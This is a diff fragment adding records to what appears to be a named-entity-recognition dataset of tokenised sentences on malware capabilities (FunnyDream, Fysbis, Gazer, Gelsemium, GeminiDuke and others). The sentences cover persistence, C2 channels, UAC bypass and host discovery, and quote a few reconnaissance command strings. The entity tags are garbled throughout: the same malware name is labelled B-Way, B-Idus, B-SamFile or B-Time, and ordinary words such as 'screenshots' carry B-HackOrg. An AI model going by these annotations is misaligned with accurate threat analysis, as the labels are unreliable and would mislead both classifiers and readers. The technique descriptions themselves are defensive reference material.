"B-Way" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "connect", + "to", + "HTTP", + "proxies", + "via", + "TCP", + "to", + "create", + "a", + "tunnel", + "to", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "identify", + "and", + "use", + "configured", + "proxies", + "in", + "a", + "compromised", + "network", + "for", + "C2", + "communication." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "check", + "`Software\\Microsoft\\Windows\\CurrentVersion\\Internet", + "Settings`", + "to", + "extract", + "the", + "`ProxyServer`", + "string." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "use", + "a", + "Registry", + "Run", + "Key", + "and", + "the", + "Startup", + "folder", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "collect", + "information", + "about", + "hosts", + "on", + "the", + "victim", + "network." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "use", + "`rundll32`", + "for", + "execution", + "of", + "its", + "components." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "FunnyDream", + "ScreenCap", + "component", + "can", + "take", + "screenshots", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "identify", + "the", + "processes", + "for", + "Bkav", + "antivirus." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "enumerate", + "all", + "logical", + "drives", + "on", + "a", + "targeted", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "parse", + "the", + "`ProxyServer`", + "string", + "in", + "the", + "Registry", + "to", + "discover", + "http", + "proxies." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "has", + "the", + "ability", + "to", + "gather", + "user", + "information", + "from", + "the", + "targeted", + "system", + "using", + "`whoami/upn&whoami/fqdn&whoami/logonid&whoami/all`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "check", + "system", + "time", + "to", + "help", + "determine", + "when", + "changes", + "were", + "made", + "to", + "specified", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "use", + "`cmd.exe`", + "for", + "execution", + "on", + "remote", + "hosts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "use", + "WMI", + "to", + "open", + "a", + "Windows", + "command", + "shell", + "on", + "a", + "remote", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "has", + "established", + "persistence", + "by", + "running", + "`sc.exe`", + "and", + "by", + "setting", + "the", + "`WSearch`", + "service", + "to", + "run", + "automatically." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fysbis", + "has", + "been", + "encrypted", + "using", + "XOR", + "and", + "RC4." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Fysbis", + "has", + "the", + "ability", + "to", + "delete", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Fysbis", + "has", + "the", + "ability", + "to", + "search", + "for", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Fysbis", + "can", + "perform", + "keylogging." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fysbis", + "has", + "masqueraded", + "as", + "the", + "rsyncd", + "and", + "dbus-inotifier", + "services." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fysbis", + "has", + "masqueraded", + "as", + "trusted", + "software", + "rsyncd", + "and", + "dbus-inotifier." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fysbis", + "can", + "collect", + "information", + "about", + "running", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fysbis", + "can", + "use", + "Base64", + "to", + "encode", + "its", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fysbis", + "has", + "used", + "the", + "command", + "<code>ls", + "/etc", + "|", + "egrep", + "-e\"fedora\\*|debian\\*|gentoo\\*|mandriva\\*|mandrake\\*|meego\\*|redhat\\*|lsb-\\*|sun-\\*|SUSE\\*|release\"</code>", + "to", + "determine", + "which", + "Linux", + "OS", + "version", + "is", + "running." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Fysbis", + "has", + "established", + "persistence", + "using", + "a", + "systemd", + "service." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Fysbis", + "has", + "the", + "ability", + "to", + "create", + "and", + "execute", + "commands", + "in", + "a", + "remote", + "shell", + "for", + "CLI." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "If", + "executing", + "without", + "root", + "privileges,", + "Fysbis", + "adds", + "a", + "`.desktop`", + "configuration", + "file", + "to", + "the", + "user's", + "`~/.config/autostart`", + "directory." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "GLASSTOKEN", + "has", + "the", + "ability", + "to", + "decode", + "hexadecimal", + "and", + "Base64", + "C2", + "requests." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GLASSTOKEN", + "can", + "use", + "PowerShell", + "for", + "command", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GLASSTOKEN", + "has", + "hexadecimal", + "and", + "Base64", + "encoded", + "C2", + "content." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GLASSTOKEN", + "is", + "a", + "web", + "shell", + "capable", + "of", + "tunneling", + "C2", + "connections", + "and", + "code", + "execution", + "on", + "compromised", + "Ivanti", + "Secure", + "Connect", + "VPNs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GLOOXMAIL", + "communicates", + "to", + "servers", + "operated", + "by", + "Google", + "using", + "the", + "Jabber/XMPP", + "protocol." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "GRIFFON", + "has", + "used", + "a", + "reconnaissance", + "module", + "that", + "can", + "be", + "used", + "to", + "retrieve", + "Windows", + "domain", + "membership", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GRIFFON", + "is", + "written", + "in", + "and", + "executed", + "as", + "JavaScript." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GRIFFON", + "has", + "used", + "PowerShell", + "to", + "execute", + "the", + "Meterpreter", + "downloader", + "TinyMet." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "GRIFFON", + "has", + "used", + "a", + "persistence", + "module", + "that", + "stores", + "the", + "implant", + "inside", + "the", + "Registry,", + "which", + "executes", + "at", + "logon." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GRIFFON", + "has", + "used", + "<code>sctasks</code>", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GRIFFON", + "has", + "used", + "a", + "screenshot", + "module", + "that", + "can", + "be", + "used", + "to", + "take", + "a", + "screenshot", + "of", + "the", + "remote", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GRIFFON", + "has", + "used", + "a", + "reconnaissance", + "module", + "that", + "can", + "be", + "used", + "to", + "retrieve", + "information", + "about", + "a", + "victim's", + "computer,", + "including", + "the", + "resolution", + "of", + "the", + "workstation", + "." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GRIFFON", + "has", + "used", + "a", + "reconnaissance", + "module", + "that", + "can", + "be", + "used", + "to", + "retrieve", + "the", + "date", + "and", + "time", + "of", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gazer", + "uses", + "custom", + "encryption", + "for", + "C2", + "that", + "uses", + "RSA." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Gazer", + "versions", + "are", + "signed", + "with", + "various", + "valid", + "certificates;", + "one", + "was", + "likely", + "faked", + "and", + "issued", + "by", + "Comodo", + "for", + "\"Solid", + "Loop", + "Ltd,\"", + "and", + "another", + "was", + "issued", + "for", + "\"Ultimate", + "Computer", + "Support", + "Ltd.\"" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "B-HackOrg", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gazer", + "logs", + "its", + "actions", + "into", + "files", + "that", + "are", + "encrypted", + "with", + "3DES.", + "It", + "also", + "uses", + "RSA", + "to", + "encrypt", + "resources." + ], + "ner_tags": [ + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gazer", + "has", + "commands", + "to", + "delete", + "files", + "and", + "persistence", + "mechanisms", + "from", + "the", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gazer", + "can", + "execute", + "a", + "task", + "to", + "download", + "a", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gazer", + "stores", + "configuration", + "items", + "in", + "alternate", + "data", + "streams", + "(ADSs)", + "if", + "the", + "Registry", + "is", + "not", + "accessible." + ], + "ner_tags": [ + "B-Idus", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gazer", + "injects", + "its", + "communication", + "module", + "into", + "an", + "Internet", + "accessible", + "process", + "through", + "which", + "it", + "performs", + "C2." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gazer", + "can", + "establish", + "persistence", + "by", + "creating", + "a", + ".lnk", + "file", + "in", + "the", + "Start", + "menu." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gazer", + "can", + "establish", + "persistence", + "by", + "creating", + "a", + "scheduled", + "task." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gazer", + "can", + "establish", + "persistence", + "through", + "the", + "system", + "screensaver", + "by", + "configuring", + "it", + "to", + "execute", + "the", + "malware." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gazer", + "can", + "establish", + "persistence", + "by", + "creating", + "a", + ".lnk", + "file", + "in", + "the", + "Start", + "menu", + "or", + "by", + "modifying", + "existing", + ".lnk", + "files", + "to", + "execute", + "the", + "malware", + "through", + "cmd.exe." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Gazer", + "uses", + "custom", + "encryption", + "for", + "C2", + "that", + "uses", + "3DES." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Gazer", + "obtains", + "the", + "current", + "user's", + "security", + "identifier." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gazer", + "performs", + "thread", + "execution", + "hijacking", + "to", + "inject", + "its", + "orchestrator", + "into", + "a", + "running", + "thread", + "from", + "a", + "remote", + "process." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "early", + "Gazer", + "versions,", + "the", + "compilation", + "timestamp", + "was", + "faked." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gazer", + "communicates", + "with", + "its", + "C2", + "servers", + "over", + "HTTP." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Gazer", + "can", + "establish", + "persistence", + "by", + "setting", + "the", + "value", + "“Shell”", + "with", + "“explorer.exe,", + "%malware_pathfile%”", + "under", + "the", + "Registry", + "key", + "<code>HKCU\\Software\\Microsoft\\Windows", + "NT\\CurrentVersion\\Winlogon</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "use", + "token", + "manipulation", + "to", + "bypass", + "UAC", + "on", + "Windows7", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "use", + "junk", + "code", + "to", + "hide", + "functions", + "and", + "evade", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "bypass", + "UAC", + "to", + "elevate", + "process", + "privileges", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "use", + "the", + "`IARPUinstallerStringLauncher`", + "COM", + "interface", + "are", + "part", + "of", + "its", + "UAC", + "bypass", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "has", + "the", + "ability", + "to", + "use", + "DNS", + "in", + "communication", + "with", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "collect", + "data", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "decompress", + "and", + "decrypt", + "DLLs", + "and", + "shellcode." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "use", + "dynamic", + "DNS", + "domain", + "names", + "in", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "has", + "the", + "ability", + "to", + "inject", + "DLLs", + "into", + "specific", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "has", + "the", + "ability", + "to", + "compress", + "its", + "components." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "use", + "multiple", + "domains", + "and", + "protocols", + "in", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "delete", + "its", + "dropper", + "component", + "from", + "the", + "targeted", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "retrieve", + "data", + "from", + "specific", + "Windows", + "directories,", + "as", + "well", + "as", + "open", + "random", + "files", + "as", + "part", + "of", + "Virtualization/Sandbox", + "Evasion." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Way", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "store", + "its", + "components", + "in", + "the", + "Registry." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "download", + "additional", + "plug-ins", + "to", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "has", + "used", + "unverified", + "signatures", + "on", + "malicious", + "DLLs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "has", + "named", + "malicious", + "binaries", + "`serv.exe`,", + "`winprint.dll`,", + "and", + "`chrome_elf.dll`", + "and", + "has", + "set", + "its", + "persistence", + "in", + "the", + "Registry", + "with", + "the", + "key", + "value", + "<code>Chrome", + "Update</code>", + "to", + "appear", + "legitimate." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "modify", + "the", + "Registry", + "to", + "store", + "its", + "components." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "has", + "the", + "ability", + "to", + "use", + "various", + "Windows", + "API", + "functions", + "to", + "perform", + "tasks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "has", + "the", + "ability", + "to", + "use", + "TCP", + "and", + "UDP", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "drop", + "itself", + "in", + "<code>C:\\Windows\\System32\\spool\\prtprocs\\x64\\winprint.dll</code>", + "to", + "be", + "loaded", + "automatically", + "by", + "the", + "spoolsv", + "Windows", + "service." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "enumerate", + "running", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "open", + "random", + "files", + "and", + "Registry", + "keys", + "to", + "obscure", + "malware", + "behavior", + "from", + "sandbox", + "analysis." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "use", + "custom", + "shellcode", + "to", + "map", + "embedded", + "DLLs", + "into", + "memory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "set", + "persistence", + "with", + "a", + "Registry", + "run", + "key." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "check", + "for", + "the", + "presence", + "of", + "specific", + "security", + "products." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "determine", + "the", + "operating", + "system", + "and", + "whether", + "a", + "targeted", + "machine", + "has", + "a", + "32", + "or", + "64", + "bit", + "architecture." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "has", + "the", + "ability", + "to", + "distinguish", + "between", + "a", + "standard", + "user", + "and", + "an", + "administrator", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "has", + "the", + "ability", + "to", + "perform", + "timestomping", + "of", + "files", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "use", + "junk", + "code", + "to", + "generate", + "random", + "activity", + "to", + "obscure", + "malware", + "behavior." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "B-OffAct", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "use", + "HTTP/S", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "use", + "a", + "batch", + "script", + "to", + "delete", + "itself." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gelsemium", + "can", + "drop", + "itself", + "in", + "`C:\\Windows\\System32\\spool\\prtprocs\\x64\\winprint.dll`", + "as", + "an", + "alternative", + "Print", + "Processor", + "to", + "be", + "loaded", + "automatically", + "when", + "the", + "spoolsv", + "Windows", + "service", + "starts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GeminiDuke", + "collects", + "information", + "from", + "the", + "victim,", + "including", + "installed", + "drivers,", + "programs", + "previously", + "executed", + "by", + "users,", + "programs", + "and", + "services", + "configured", + "to", + "automatically", + "run", + "at", + "startup,", + "files", + "and", + "folders", + "present", + "in", + "any", + "user's", + "home", + "folder,", + "files", + "and", + "folders", + "present", + "in", + "any", + "user's", + "My", + "Documents,", + "programs", + "installed", + "to", + "the", + "Program", + "Files", + "folder,", + "and", + "recently", + "accessed", + "files,", + "folders,", + "and", + "programs." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GeminiDuke", + "collects", + "information", + "on", + "local", + "user", + "accounts", + "from", + "the", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GeminiDuke", + "collects", + "information", + "on", + "running", + "processes", + "and", + "environment", + "variables", + "from", + "the", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GeminiDuke", + "collects", + "information", + "on", + "network", + "settings", + "and", + "Internet", + "proxy", + "settings", + "from", + "the", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GeminiDuke", + "collects", + "information", + "on", + "programs", + "and", + "services", + "on", + "the", + "victim", + "that", + "are", + "configured", + "to", + "automatically", + "run", + "at", + "startup." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GeminiDuke", + "uses", + "HTTP", + "and", + "HTTPS", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Way", + 